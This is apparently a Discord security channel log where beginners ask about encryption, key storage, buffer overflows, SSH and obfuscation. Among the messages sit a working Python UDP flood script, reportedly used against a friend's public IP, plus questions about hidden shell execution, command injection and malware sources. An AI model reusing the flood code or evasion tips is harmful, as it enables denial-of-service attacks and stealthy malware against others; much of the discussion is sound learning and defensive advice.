#cybersecurity

.

@lapis radish Hey

I added deny my own IP but can still access the site

Do you have any errors in error log?

Oh yeah

Listen

Actually

Wait

Okay, so? What's the status? Should I quickly setup nginx in Docker?

I need help obfuscating and packing my python script. I tend to use pyarmor, but are there any better obfuscater?

pyarmor should be good

I made a python code that runs in the background, and it runs some shell commands. I used the shell commands with subprocess.Popen which basically just brings up the console. but when I convert this python code into exe with pyinstaller --onefile -w shell.py it gives an error. The error caused from the -w argument. The -w argument disallows the console.

proc = subprocess.Popen("dir", shell=True, stdout=subprocess.PIPE)
var_5 = proc.stdout.read()

is there a way to run shell commands, get output without needing to worry about the console issue?

@tall haven

I need your expertiseee

sorry for the tag

Please don't ping people unsolicited. I'm not the only here that can help.

You're in the wrong channel by the way

what category does this belong to?

No category just claim a channel #❓｜how-to-get-help

I can't help you right now. Someone else will have to

hey what are debian mirrors ?

a copy of the debian package index

or repository

Hey

Buddies

If someone ddos a website

then how will they know?

how will who know?

a web owner?

like SEO of the web or the dev

By seeing an abnormal traffic pattern, usually by many different users on many different devices doing very similar things

Ohk

thanks

!

How would I go about encrypting and decrypting passwords. I'm making a password manager and will be storing the passwords in a database, I've been reading of a few methods for encryption but I'm just wondering if anyone knows of any resources and/or libraries that could help me with this process.

Firstly: you never decrypt passwords.

They belong to the user, only she knows her password.

What you do is you create a salted, cryptographic hash representation of the password, and store that.

what do you mean by never decrypt, how would I view my passwords in their normal text representation without decrypting the hashed representation?

Ah sorry @acoustic hedge I totally misread that you are making a password manager.
Of course being able to decrypt is an essential feature.

all good lol

Any libraries you would recommend?

Yes indeed. I've had good experience using Argon2 in passlib
https://passlib.readthedocs.io/en/stable/index.html

But these are hashing functions, not what you want.

Cryptodome is quite popular:
https://pycryptodome.readthedocs.io/en/latest/src/cipher/cipher.html

Now that I think about it, I could probably just make my own function to encrypt and decrypt them, the code that does so would only be running on my machines, so it's unlikely anyone will be able to reverse engineer it

But then again it's unlikely anyone will get into my database so I may as well just go the full mile for practise

The first rule of cryptography is to never roll your own crypto algorithm 🙂
The second rule is that managing the keys is the hardest part.

Cryptodome looks good, I'll have a look through their docs

I wanted to do the same project in the past and found this video to be extremely helpful. https://www.youtube.com/watch?v=H8t4DJ3Tdrg

Successfully Enabled!

Successfully Enabled!

Successfully Enabled!

selfbot sounding moment

definitely a selfbot

How do I make a bot that changes my password for any site

that sounds like it's against any website's terms of service

automating changing passwords

what if they have an API that does that

well it depends what those sites say about that API

I doubt that there's an API for that though

yeah

that'd be very dangerous

indeed

uh

well no

basically any site will have an api that can change passwords

even if it's not documented publicly

Their ToS probably won’t allow you to use your own client to request it though

yeah

can someone explain what a nop sled does?

my understanding is that you create a payload

but what's the purpose of making one

why dont u just make the program do that?

https://github.com/intere/hacking/blob/master/booksrc/exploit_notesearch.c

specifically in context to this

Not super sure of the context, but if it's for buffer overflows maybe this'll help...

Now I want you to imagine this this your mind:
Think of a memory pool as a dart board
Think of the instruction pointer as your dart
The bullseye is your shellcode
You're blindfolded so you don't know where the bullseye is on the dart board (shellcode inside the memory pool)

Your job is to hit your bullseye with the dart (hit the shellcode with the instruction pointer)

How can you ensure you hit the bullseye(shellcode) with your dart(instruction pointer)?

The easy way is to increase the size of your bullseye until its so big that you can hit it without looking :)

A NOP sled is appended to the start of your shellcode. So by increasing the size of your shellcode, you increase the likelyhood of getting one of the NOP memory addresses inside the instruction pointer. Hitting any point within the middle of a NOP sled, the CPU instructions will 'slide' down the NOP sled to your shellcode appended to the end, thus RCE.

Hopefully that makes sense.

@sour owl thank you!

is there a good way to practice reading assembly code?

why can't shellcode be exectued in the program itself? is it bcz of the elevated permissions when it goes through the return?

I think https://www.begin.re is a good source for the rudimentary assembly plus reversing aspects

I’m not quite sure what you mean by this, could you elaborate?

ok so I understand on a very basic level on how buffer overflow attacks work

they overflow the heap and rewrite the return address

to run a "payload" you have coded in

how does the escalate permissions?

is it that the payload is written in assembly so the return address runs it as raw assembly code allowing you to do the things

also thanks for the link 👍

gotta learn all this for ctfs hehe

Are you talking about escalating OS level permission?

Or just allowing you shellcode to run from within the program?

im reading a book right now

and they're basically like using a buffer overflow you CAN excalate OS level permission and grant you root access

but how does that work?

also why cant you just run shellcode from within the program?

come back ;~; im dum

Sorry I was looking up this website to send you. So, shellcode is essentially another very very small program thats written in assembly. Usually it’s very limited in function, so its usually just used it to spawn new shells on the host machine.

I don’t really know if people use shellcode specifically for elevating permissions rather they use shellcode to get themselves an interactive shell and use the interactive shell to just escalate permissions manually.

http://shell-storm.org/shellcode/

This website has a lot of different shellcode you can browser through. It can give you an idea of what it’s capable of.

I should say, shellcode is almost exclusively for spawning shells, hence the name really. So the attacker can control the machine as though they are logged in.

👍 thank you

No problem. @ me if you have questions. I can try to help

will if i have any for sure

cool

cool

cool

Hey I am using windows, and I also have a mac, how canI ssh into my mac?

through my windows

you need to install ssh on the mac

ssh is already in mac, but how would I go about accessing my files in my mac through windows?

Just use anydesk man

huh?

i do not know what that is

its remote desktop software

https://anydesk.com/en

and what is it used for?

and why should I use it?

you can access your files and terminal

and control screen

ohhh

let me take a look

dm me I have some questions

Hmm but how would I go about doing it through ssh?

okay

why do you want ssh when you have anydesk or teamviewer?

plus you can easily transfer files

For Windows, the question is interesting. If you had a Linux or another Mac computer, ssh would be quite easy to use, maybe even more than AnyDesk. But Windows?

He wants to ssh into his Macbook

I think AnyDesk is a good alternative, though it uses more of your network connection

yeah also with AnyDesk you'll have to accept yourself on the mac

Also, if you want to transfer files you will need to run FTP or SFTP

I think teamviewer is the best option here

or just use PuTTY (https://www.chiark.greenend.org.uk/~sgtatham/putty/)

Putty is software used to SSH into a tunnel

you dont need anydesk

ssh is fine for transfering files

doesn't windows 10 already come with openssh?

if not, you can install it from somewhere

also checkout scp

yeah i believe windows 10 has ssh

don't think its' openssh though

pretty sure it's microsoft's own client

C:/WINDOWS/System32/OpenSSH/ssh.exe

thats what i have

@woven gazelle

https://www.howtogeek.com/336775/how-to-enable-and-use-windows-10s-built-in-ssh-commands/

Oh it is openssh?

EIP, ESP, and EBP are all in the stack right?

EIP is the instruction pointer by convention

it points to the code, which is usually not on the stack(unless you're doing some hacky shit)

EBP is the base pointer by convention(points to start of stack frame), though it can be used a general purpose register with -fomit-frame-pointer in gcc

Oh, can I DM you for further progression?

Yes, what's up?

@fading plaza where is the EIP stored?

my understanding is that you overflow the heap in order to spill over into the EIP

and somehow find the offset and thus find the EIP

which u edit or sumn

The EIP is pushed onto the stack, and then popped back off when the function returns. It's modifying the EIP that was pushed on the stack rather than modifying EIP directly.

I believe.

just cheked

eip is in da stack

eip doesn't point toward the stack

and eip itself isnt on the stack either

thats the return address

similar, but different

for a vanilla buffer overflow

you're overflowing the buffer to overwrite the return address

since ret is basically pop to eip

ahhh that makes sense

👍

i want to do the slmail thing

but i only want to do it on the linux side >:(

hey guys I have been designing an offline password manager with kivy for the last 1 year. At the moment I am at a roadblock, where I need to use win api or any platforms api to block it's clipboard history functions while the app is in use, if anyone has any idea about how to approach this problem in python please @ me, thanks.

Hi. Any Python programmers want to build an open-source script with ISRD.com (credit will go to you!) that will be published on PacketStormSecurity.org as well as WPScan.com (see: https://packetstormsecurity.com/files/author/5751/ and https://github.com/wpscanteam/wpscan/issues/1299 ) - it has to do with distributed, smart password checking against WordPress websites - see: https://www.fortiguard.com/encyclopedia/ips/48868

!rule 6

So you know how in Tor the last node usually stores the data that you've search through a browser

is there a way to encrypt the last Node or is it not possible?

Idk if i should ask this here but ill try anyway. I'm going to buy a new gaming computer very soon to play some games. some GTA Online and some other stuff like Cyberpunk. when i told people that i want to play a lot of online games they told me to use a VPN because i might get DDoSed. is that how it works? they can just get me offline? it can be all BS but i still wanna know....

@olive iron I'm glad you asked! What a VPN does is instead of having your traffic go to your ISP, the data goes to the VPN. It's really useful if you were using a public WiFi, as it hides your ISP. However, I think the chances of you getting DDosed in a private network is fairly low (Although It CAN happen, you are at a higher risk with a public network due to their lower cost).

afaik they ddos websites that have open ports and dmz and all that internet goodies that idk. how they can ddos me (because you said it can happen)? i dont have any open ports im not on dmz and my internet is ok in terms of security afaik

Well what usually happens is that a hacker can find weak points with a users connection and use that weak point to get your information. Other times they create an replica of your network to get you to click on it. It really depends on how much time and resource a hacker has.

so a basic skid cant just get rid of me cuz i annoyed him. right?

btw i know that if you have a "mod menu" in gta online you can get someones public ip

Yeah, I personally would not worry about it. Many companies know about the possible vulnerabilities a network can have, which is why they continuously update and maintain their network to prevent attacks from happening.

If you personally feel that having a VPN is necessary, then you should do so. However, it won't be the end of the world if you forget to use one.

oh, ok

For me, I mostly use my VPN for web browsing

alright so lets just wrap it up.

• i wont get ddosed (unless the hacker is very skilled and has nothing batter to do)
• ip stressers wont get rid of me
• networks are not made out of lego

is that all?
security is kinda cool

Pretty much

Tbh I know more in the Hardware/Software side than I do with networking. I recommend you to ask a person, who knows how networks work, for a second opinion.

ok

i wonder where they learn this from...

The Hackers?

that and networking in general

Well back before the Internet was created, The first networks were used by the Government for working on projects.

and a lot of it boils down to connecting one computer to another

whether if its a radio frequency or using a cable

ok. are there free resources that i can use to learn more?

Personally I don't know any reasorces, but I strongly recommend watching Tech Quickie on Youtube.

oh. i know that one. ok i will

thanks for helping i appreciate that

Thank you for asking!

If you ever have a question, you can always @me

I would be glad to help

ok. thanks!

Anyone knows what precautions to take when making a telegram bot? So the bot doesn't get hacked

i mean

make it not have any security flaws

dont trust user input

always ensure that is properly escaped if you're passing it to dangerous functions like file IO and db stuff

avoid using os.system and subprocess unless absolutely necessary and ensure user input is safe

/\ all good useful advice

since most people don't have acess to that knowledge

the numbers of sensitive data stolen is absurd

There is a rule for it: don't store any data that you don't need

And always check both sides of one-directional road

Quick question, I'm making a password manager and am planning on encrypting the information I'm storing in a remote database. The issue is I plan for these passwords to be accessed by multiple devices, meaning I can't just keep a key stored somewhere on a single device.
I plan on funneling all my database queries through a docker container that's going to keep track of some stats, so I was just wondering if anyone can think of any security issues that could occur if I stored my key in the docker container and decrypted/encrypted the data in the container.

To me it sounds like this might be even safer than storing the key on a device but my experience with this field is next to 0 so I'm all ears

Why everyone creates password manager 😂

In your scenario I assume that passwords are stored in Docker container, right?

No I've got an ElephantSQL database setup

I'm just funneling the queries through the container

To keep track of the number of queries, etc

So I figured I could do the encrypting and decrypting of the data through that funnel

You should think about end-to-end encryption so everything in the database should be in encrypted form

If I understand correctly your architecture

So you can share same key on each device (can be encrypted by different passwords ofc) and when you get payload from database you decrypt it using key and receive plaintext so anyone between you and database (and even database) cannot read anything

That would be preferable, I'll have to read into it more cause I've got no clue how that would work

In this scheme (when you have one master key) there is a problem with DB re-encryption (with different key) because you must then synchronize key on every device but I don't think that there is a perfect solution and all depends on your risk analysis

Hello, i hope this is alright to ask, but i'm looking for any resources to educate myself on information security concepts and knowledge of the cyber threat landscape, any pointers will be appreciated!

Bruce Schneier has good books

thank you @lapis radish ill go check out his books

Handbook of applied cryptography is also nice position

@lapis radish thank you ill take a look at it as well, i noticed it was first published 1996, i take it it can still be applied today?

It's good to know the basics, there are many algorithms from '50, '60 or '70 which are still the best now 🙂

okay sweet, the closest i've come to security is hashing some passwords for one of my programs, so thanks for the pointers 🙂

Glad to help

import concurrent.futures
import socket
import threading


# prevent thread printing conflicts
lock_print = threading.Lock()

# get hostname or IP address from user
# and then remove any spaces entered
address = input("\nEnter hostname or IP address: ")
address = address.replace(' ', '')

# get max number of workers from user
# and verify input is positive integer
workers = 0

while not workers:
    try:
        workers = int(input("\nEnter max number of workers: "))
        break
    except:
        print("\nInvalid input, try again")

# define port scanning function
def scanner(address, port):

    inspector = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    inspector.settimeout(1)

    #try:
    inspector.connect((address, port))
    inspector.close()

    with lock_print:
        print("Port number " + port + "is open")

    #except:
    #   pass


# use threaded pool with user specified workers
with concurrent.futures.ThreadPoolExecutor(max_workers = workers) as execute:
    for port in range(1, 1001):
        execute.submit(scanner, address, port)
        # print("scanned port " + str(port))

i tried posting in #networks

basically this python port scanner doesnt output any open ports

Docker rootless recently came out of experimental. I noticed it required unprivileged user namespaces, which are normally disabled by many distros due to apparent security vulnerabilities. What is the status of unprivileged user ns in 2021? Were the supposed security issues with it resolved in the kernel? In any case, how do its security implications compare to those of running Docker in rootful mode?

of course, but people not related with that area

is there a good resource to learn ethical hacking? I am moderatly experienced with sockets because of networking courses I have taken; however, it seems like most of the stuff online is just showing how to use a tool that someone else already made, and personally thats not too fun imo

please feel free to ping me!

https://www.humblebundle.com/books/hacking-101-no-starch-press-books

Check out the books here

Read one or two then get straight to it

thank you!

@mellow wren remember when we talked about ddos attacks? i wanted to see what happens when i try to attack a network, so i made my own script.... it seems to slow down my network (cuz i tested it on my own network) and it slowed down my network and drops it if i let it run for a while.... i tried running it on my friend's network (with permission of course) and it worked but not on the right person lol. when i tried attacking my friend's network it dropped my network (probably my code is crap).

so it seems with batter code it is possible... just my code is crap

As far as I know Python is not the best solution for DoS attacks because you need to have a lot of packets per second - Python looks too slow for that

im not gonna use it to drop other peoples's net. i just wanna learn and im currently using python

and it still dropped my net

I need more details to understand how your code works and how you attack yours/your friend's network

i can send it to you

i used a method called udp flood

So you have two machines in your network, one is an attacker and another one is a victim?

no, i just attacked my own public ip. is it how should i do it anyway?

cuz i tested it on my own network
I assumed that you have tested your scripts in your local network

i guess? im sorry, im a noob.. if my own public ip is my local net then yes

I think you should start with some theory because DoS/DDoS attacks and others need some background like knowing basic stuff about networks, protocols and so on

ok

i mean, i know that its spamming connections/messages to a network

Not directly to a network but to a host

If you are sending packets to one host (not broadcast) so you are not attacking network but your target

im sending directly to my target afaik

do u wanna see the code?

You can post it but remember to do not publish any sensitive informations like passwords and so on

you mean my ip?

Yes, for example

ikt

import socket
import threading
import time

pack_num = 0

target = input("Enter target IP: ")
port = int(input("Enter target port: "))
msg = input("Type message: ")
full_addr = (target, port)
print(f"say goodbye to {full_addr}")

def conn():
        global pack_num
        global msg
        while True:
            pack_num += 1
            try:
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                s.sendto(msg.encode(), full_addr)
            except Exception as err:
                print(err)
                s.close()

def count():
    global pack_num
    while True:
        old_num = pack_num
        if pack_num == old_num:
            pass
        else:
            print(pack_num)


threading.Thread(target=count).start()
while True:
    threading.Thread(target=conn).start()```

Can you format it?

Using ``` before code and after

ok

Like
```
print("hello")
```
produces

print("hello")

You can edit your message, do not need to post next one

now i know

You can also specify language like
```python
print("hello")
```
Result

print("hello")

well i formatted it

Okay, firstly I don't really know that spawning many threads have effect in case of Python because of GIL (Global Interpreter Lock)

oh, oops lmao

It looks okay... Have you tried to catch incoming packets? Here you have some examples: https://wiki.python.org/moin/UdpCommunication

You don't need to create s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) again and again, you can create it before loop

ok

overall the script is ok?

If you want to send UDP packets over and over, yes. But you should firstly write a program that runs in one thread and then upgrade with threading module

ok. but i asked about it attacking my own network while targeting another net

which is weird

You shouldn't send such kind of packets through publicly available networks

There are many network devices between you and target so any of this devices can cut off the connection

wdym

i attacked port 80 btw

[you] - [your router] - [isp device] - [...] - [your target router] - [your target]

oh

well how should i send these sockets?

Just don't send, test your program in your local network

i tried it on my friend and it dropped me...

he gave his ip to see what happens

I cannot help you, you shouldn't run your program on any publicly available addresses even if you have a permission

i do have permission

he sent me his ip

Whatever, in some countries it's still illegal as far as I know

its not with permission

I don't want to argue with you

!rule 5

Do not provide or request help on projects that may break laws, breach terms of services, be considered malicious or inappropriate.

Test it in your local network

its working on my local network. i guess ill just leave it

So if it's working in your local network it's over for me 🙂

ok, thank you for help

Your welcome

@lapis radish one last question about gil: the maximum amount of threads i can set is the amount of threads i have on my cpu?

You can spawn more threads but it's less effective because you have something like cost of context switch

GIL is more like I am Python, I can run code of one thread at the time regardless of what number of threads you spawned as far as I know

oh so they just get slower basically?

It's like you have four tables in the restaurant and four waiters. It's okay because you have one waiter per one table (when waiter is the thread in your CPU and tables are your tasks). It's not okay when you have for example eight tables for four waiters because one waiter has two tables so he need to walk from one to another and cannot take action instantly when client from such table wants

Walking from one table to another one is context switch and takes time

oh, ok

Hi, I need help in my school final project. I'm trying to make a function which returns all running process' writing bytes / reading bytes / cpu usage. Tried using Psutil and it didnt work as it ran into an access denied error even when run as admin. Also tried WMI but it has no section of writing bytes/ reading bytes that i have seen. would love some help thanks

Is there a known hack using only forward slash and/or colons in user_input in urls?

a known hack

for

what

what

well the <name> part of the variable shouldn't be like

their name

should probably be an id

either numeric or like a username

where it's restricted to certain characters

Nevermind. Thanks anyway for the help.

anyone pro in stuff like hashing base64 or rot13

uh

neither of those are hashes

nor do they require professionalism

but

yes

how to convert your .asm to shellcode?

maybe they meant like hasing, base64, or rot13

Just use NASM and specify the bin option I believe.

👍 thx u

So I need some help with something

I need to find a way to run a command in this ping prompt

https://pastebin.com/1htzUn1Q

Heres the code it uses

whats this for

https://portswigger.net/web-security/os-command-injection

Hi, how could I hide an password or an api key thats in main.js because people can access it in the browser

just dont give me links

If you have client-side code you should have different key than for backend

dont put the key on the client side

It's probably not wise to call a private API on the client and instead have that done in your backend.

hey guys I have been designing an offline password manager with kivy for the last 1 year. At the moment I am at a roadblock, where I need to use win api or any platforms api to block it's clipboard history functions while the app is in use, if anyone has any idea about how to approach this problem in python please @ me, thanks.

why do you need to block clipboard history while the app is in use

I've just installed cockpit-project https://cockpit-project.org/ to have a GUI for administrating my web server and a few minutes after i've installed it someone's trying to ssh brute force passwords on the server. is that because i have port 9090 open for cockpit?

or might there be something in the cockpit project software package that introduces a vulnerability in my server?

SSH password bruteforces are pretty common

You should always use key based auth and disable password auth, or install something like fail2ban

i have done both 😄

hope i'll be fine haha

That should be fine then haha

great, thank you!

Hi everyone
can someone please help me with my authController function
https://stackoverflow.com/questions/65741868/nodejs-authcontroller

Hey all random question and not sure if appropriate here so lmk if it isn't. I'm changing my VPN and I'm tryna wrap my head around the different offerings and what I value most. I'm trying to go for maximal privacy. So I have two questions:

1. Do I avoid split tunneling? Seems kinda counterproductive to route some traffic through public.
2. How important is it to have my IP masked with a dynamic IP v a static one?
   My domain is data science so web security is a bit of a stretch, anything advice is appreciated

I think this channel is for writing secure Python code. Try asking in one of the off-topic channels.

thank you

is there any way i can secure my code so people wont look in it? or at least protect from being changed

not really

why do you want to do this

you certainly shouldn't if you're trying to hide a secret in it

like a password

Security via obfuscation is doomed to fail

Security by obfuscation reduces the number of possible attacks for a short while. It might rarely escalate the resources to attack your system too high for some attackers. However, a determined attacker will never give up because of that

The point is that while it is tempting, this has been tried time and time again, and has always failed

latest famous cryptographic example is the Enigma machine

I wouldn’t say the enigma was security by obfuscation

The cryptographic keys were secret, but that’s true for every symmetric cipher used today too

definitely was. they tried to protect the machine itself, and it was much easier to crack once they knew how it worked

well, obviously. But that wasn’t the only layer of security as you implied

even knowing the workings of the machine it still provided like 60 bits of security or something

if you don’t know the key

But you’re right too, that’s why ciphers nowadays are public knowledge

the best thing to do (if you can secure it enough) is to show your implementation. Completely

I think you’d be interested in the“Starbleed” vulnerability

There’s a nice video about it

https://en.wikipedia.org/wiki/Kerckhoffs's_principle

if leaking the algo makes it insecure, then its a bad algo

and you shouldn't be storing keys clientside

if I’m trying to make some kind of encrypted forum thread to be accessed by multiple people independently or at any time for anyone, am I trying to implement broadcast encryption...? I think revocation of a member is not necessary since my server can just block someone from reading in the first place, but I heard about needing to estimate a cap since adding members isn't possible? I don't think new members need to view previous posts (in case of some dynamic algorithm).

why are you encrypting it if you can block readers

How is able to generate key? Server? Or one of those clients?

I think that question is not about it

hi am new to python i need help

What kind of help?

i need to be able to code

It seems that it's wrong channel

!resources

ohh

I’m ngl I have nearly zero clue how broadcast encryption works and don’t even know if I should use it. But I’m pretty sure the pt is to have an original client encrypt the message for the rest of the group and hopefully store it as a single db record

Marketing. Server shouldn’t be able to store a thread’s messages in plain text. Chat and thread.

I don't know broadcast encryption. I thought about some kind of hybrid cryptography here 🤔

Hm well I didn’t want to do a traditional asymmetric style encryption. If I had 100,000 members, that’s 100,000 db records/messages, encrypted, and stored in the db per message

You can have one key per message (which can be used multiple times) and this key can be shared across participants or stored in encrypted form using users' public keys.

However maybe there is a better solution, this is just a naive approach

Hello!

Is it safe to give the user both and the "access_token" and the "refresh_token" at auth?

They way I implemented it is when the user signs in they get a token. That token stays alive for 15 minutes. After 15 minutes my vue spa calls an endpoint /auth/refresh then api verifies and returns refresh token.

Does this make more sense from a security standpoint?

@thorn obsidian if you are implementing oauth its fine to give the user the refresh token along with their access token when they first authenticate

I need some help, so I have a django web server.
Users can create objects called as "Boxes" and upload files into them.
These files are encrypted on storage and decrypted on retrieval.

I want to make sure that every box has its own unique encryption key.
This key will be referenced to encrypt the files the box has.

Where can I store this key?
Will it be on the server or on the database side instead?
If it is the server side, then can someone please give me an example?
Like a use-case with django. I saw other implementations but couldnt use the same with django.

Also, can this encryption key for boxes be changed?

From technical point of view it's impossible to create different key for every box due to finite number of possible keys

why not

but then.. If an attacker gets a single key he can decrypt files of every box

AES 128 bit for example has 128-bit length keys so you cannot create more keys than 2^128 🙂

oh

alternatives?

You shouldn't care about that

what

Just pick a random key and use it

okay

where will I store this key

You don't need to know that there is a box with the same key

It depends on your security model

In my opinion user should store a key

client side?

Yep

You can check Send from Firefox

but I want to store it on the server side

It's similar project (already down)

I read this

https://security.stackexchange.com/questions/157422/store-encrypted-user-data-in-database/157426#157426

If you store encrypted files and encryption keys on your side where is the security here?

but then the user will know the key

and we have only one key for the entire webserver

then he can access every file

User should use key on client side

I dont understand how this works
can u give an example

where does the client store the key

Where server can know a key it's not secure anymore

It was launched on March 12, 2019 and was taken offline on July 7, 2020 after the discovery that it was used to spread malware and spear phishing attacks.
Send From FireFox

Like I said - Firefox Send

Ya, like I said - it's down

But you have source code in GitHub

okay so every user has their own key?

Every user has a key to his own box

You can create many boxes with same key/password

It's your decision

So user creates box, picks password and use encryption on client side and you as a server get encrypted payload

From the other hand you send encrypted payload as a server and user decrypts it on the client side

I got it
But what if client sends not encrypted payload

how can I find out

Creating such system is not easy if you don't know what to do so you should read more on this topic

How can you check that it's encrypted or not?

yes

You can measure entropy but it's not the best solution

how does google drive do it?
I heard they do server-side encryption

I don't know how Google Drive do it but I think that them do not use client side encryption

So it's not secure

Google can scan your files (and they do it)

It's not secure solution

If you want to read users' files you don't need encryption 🙂

Here is what I want to do

user sends normal file - say an image

we encrypt the file before storing it

to ensure their privacy

when they want the image to be retrieved we decrypt it```

is this approach good?

Not for user

why not

User should encrypt/decrypt data on his own

There is no place for third side here

How user can trust the server?

what could possibly go wrong here

Server is malicious and can modify files without user's permission

the same can happen if the user encrypts on their own right

Nope becouse server doesn't know what is behind the encryption

I would say it depends on what you want, if you are storing the image yourself, server-side encryption would be enough and probably better than a client-side encryption

I am storing the file myself
like this is a storage point

users can store and retrieve data

using the webserver

Oh, then sorry, you said that users can create boxes so I thought that were something like a public site for storing encrypted files

wait

In this case, except if you are creating a security oriented service like Keybase, you should be fine with server-side encryption

like users can create boxes

and then people can join boxes and upload to it

so if u want client side encrpytion

there are two members A and B in the box

A sends client- encrypted data

B sends unencrypted data

we dont want that. The box should contain encrypted data as a whole

thats why I got confused when u said that client encryption

@lapis radish

for this case is server-side encryption better?

Okay, I don't have time to explain your whole theory about security and cryptography. Just think a while: server can have access to users' files? If not you should encrypt on client side. If yes you can use server side encryption

what about
the client can encrypt the data if they want before sending

but overall, we always encrypt the data server-side

The problem with client side is encryption is how you share the client key between the different clients, and you can’t moderate content you don’t have access to as the maintainer

so do you mean for this case we can go with server side encryption?

I’d say so

one whole key for the server or a key for every box?

where will these keys be stored? I dont want to store it in the database

You’ll have to store them somewhere on the sevrer, either in a database or similar

https://security.stackexchange.com/questions/12332/where-to-store-a-server-side-encryption-key#:~:text=Much of the secure storage,which is tougher to do).

I read this

It doesnt suggest db storage

in case of data leaks

Yes, ideally you’d separate it as much as possible

okay

somewhere in the server
you mean I should hard code it

or how..

You could just have them as regular key files in a specific directory

if the application has a million boxes

then I need to make million .key files

and these files can be deleted manually..

can u please answer this I have this doubt @void aspen

Hmmm

I’d periodically rotate the keys

Like a new key every month

is it one key for every box?

I’d use one key to encrypt everything, but rotate it every month

have anyone done like sniffers to see if someone is trying to sniff payload being sent out from the exe

Hello @dense moon, we won’t help with data sniffers, even if they are sniffing sniffers since we can’t check what you are actually using it for

ah thats fine

I have a bunch of repositories containing websites that I have on my web server. I want to expose them to nginx, while making sure env files, .git etc are hidden. If say, the code I want to expose was in a single folder (called code)how would I secure that without causing issues?

I'm thinking get nginx to route directly to the "code" folder. Would this be secure?

If you need more information just mention me

Hello everyone, i wish to start my career with ethical hacking someday, acctualy I am studying mechatronics, can someone write me few things i should start learning with? 🙂

I think you should start with tryhackme, then playing to ctfs, then hackthebox and maybe OSCP after u have enough experience

Thank you a lot for advice! 🙂

PTS is a good start

What you mean by PTS?

https://www.elearnsecurity.it/course/penetration_testing_student/

pentesterlab is also cool

Thanks!

Hey, i don't know if that fits in this channel but i want to ask why virustotal detects 6 viruses in my python project? It's just a script which opens an online shop, graps the price and writes it in an excel file

Hard to say without source code

pyinstaller?

yes

Are the imports enough?

@hot moat the initial use of pyinstaller is likely lowering the reputation score and secondarily if you look at the class of trojan which is Trojan-PSW it's one that steals account login details so your program may have some features that have triggered these signatures. You may be able to raise the reputation score by signing the binary and if that doesn't work you can contact the AV vendors for manual analysis.

Not exactly, you can perform some suspicious I/O - then imports are useless

okay so that are the 3 files:

Main: https://pastebin.com/rcgGPXQR
Email Class: https://pastebin.com/hDFGQL6C
Data Manager: https://pastebin.com/1NdSKdbR

and please i'm new to programming so don't mind my terrible code appearance

I can only quess that maybe for some AVs reading Excels and sending emails in one program can be marked as virus actions 🤔

yes maybe

microsoft defender also detected it

but where do these names come from?

Which names?

these from virustotal

You can search Trojan.PSW.Python for example and read about this kind of trojans

okay but it didnt find a file or something called Trojan.PSW.Python? does it just recognize that my program is doing something this virus would do?

Exactly. What I found is that Trojan.PSW.Python are malicious programs which can stole confidential data or send malicious emails (like phishing emails)

Is there any way you can decrypt stegano on python?

I heared you can but I have no idea what to use

I need to decode an image

okay, thank you. :)

Guys I am a beginner and I want to learn ethical hacking in deep.
Can some one help me with this.
As to which path should I follow

how much do you know

Do you know steganography algorithm?

Your welcome

?

If you want to recover information you need to know the encoding algorithm

although if you're just doing a ctf then they're probably using one of the standard command line tools

steghide

Hi

Hey

Hey. Does anyone have DarkWeb data scrapping script?

Hello , does anyone know how to disable kernel stack canary for a specific module while compiling the linux kernel module?

have you checked github? they might have something of interest for you

I have a problem using scapy in python3.9 on macbook pro. Whenever I try to run my script with srp it says : "No /dev/bpf handle is available !"

Yeah yeah I got a perfect component for that.

I have completed a basic course in cybersecurity. Use of tools like metasploit, ProRat and thats it. I want to work up on my skills from where shall I begin.

@dim tartan try running as root

Hello, I am currently working on encryption in my flutter app wherein I am using RSA key-pair generator to get public and private key using the following code-

import 'package:rsa_encrypt/rsa_encrypt.dart';
import 'package:pointycastle/api.dart' as crypto;

//Future to hold our KeyPair
Future<crypto.AsymmetricKeyPair> futureKeyPair;

//to store the KeyPair once we get data from our future
crypto.AsymmetricKeyPair keyPair;

Future<crypto.AsymmetricKeyPair<crypto.PublicKey, crypto.PrivateKey>> getKeyPair()
{
var helper = RsaKeyHelper();
return helper.computeRSAKeyPair(helper.getSecureRandom());
}

Now I want to get the keyPair.publicKey in string format but if i print keyPair.publicKey, it shows "Instance of RSA publicKey" . How can I get it in string format??

how to hack the mainframe and access ip address to hack google and make big money

😐 ok

@lean cipher go to a flutter specific server

https://discord.com/invite/N7Yshp4 is one

Okayy

use os http aiohttp module

No idea what that is cuz I dont do networking lol

RE >

google it then

that's the best way to figure something new out

I was being sarcastic

And Im not rly interested in networking rn

Is there a good website with lots of malware for analysis

just click on some random piracy advert links in a vm

see what happens

Lmaooo

any python for cybersecurity books or webpages

I have a fundamental knowledge of python

https://github.com/rshipp/awesome-malware-analysis#malware-corpora

@main ibex

reminder to not run any on your own computer, for obvious reasons

I am guessing that is not for me haha

... I'll run on vm obv

And make sure it can't brake vm

@hard frost what u lookin to do

😡 stop pingi n me i am so angrty

rien ne s'est passé

i think i got some malware or smth

;-;

i was installing skyblock map

and i unziped the file

now i cant move or delete the file
it says i dont have premission but im an admin

i think i have to mention that im on linux

also the folder looks like this for some reason

try running the file through something

theres websites that scan files for malware

did you give it admin privileges

no

well i used commands to remove it and it worked

@thorn obsidian rkhunter --check && chkrootkit

i was about to type that

idk why i couldnt remove it with the gui

Probably because its permissions are skewed

anyone avail to help with a "cannot mix bytes and nonbytes literals" error

pm me please

it's probably because you'e forgot to put a b in front of a bytes literal interacting with another bytes literal

What you tryna fuzz :thenk:

why are you using root

kali defaults to non-root user now

anyone selling pyarmor obfuscation?

please delete this message if this breaks rules, i couldnt find anything against the message! sorry if it does :0

Why buy anything?

Turn your Python code into C code, then tweak it a bit and compile it with whatever flags you want

can u help me w that?

Sure

I'm not on my computer though

hmu whenever you can bro, i would really appreciate it

I'll be home in 2 hours

kk

ay bro, u back?

no way ive just messages exactly 2 hours... wtf

15 min

kk ty

Back now @vapid turret, what's up?

yooo bro

so i am making a project for friends to use.. but i am also practising to one day release it myself..

i was wondering a way to protect my source code, and also make it very hard to crack /impossible to crack.. i saw some python to C... but i couldnt get it to work

mainly cuz im a dumass

The easiest way is with PyInstaller, but it'll compile your Python code directly to an executable

yeah i know... but it is easily decompiled

• it can get cracked very easily

Do you already know some C and compiler flags?

nah mate, im a python guy

unfortunately

You should at least learn the basics of C

You're going to modify the source in that after all

yeah i guess.. it pretty easy right, i know some from modding etc

It's easy to learn, but hard to master

Hey @dawn tusk!

oof

dm me if u like

Big oof
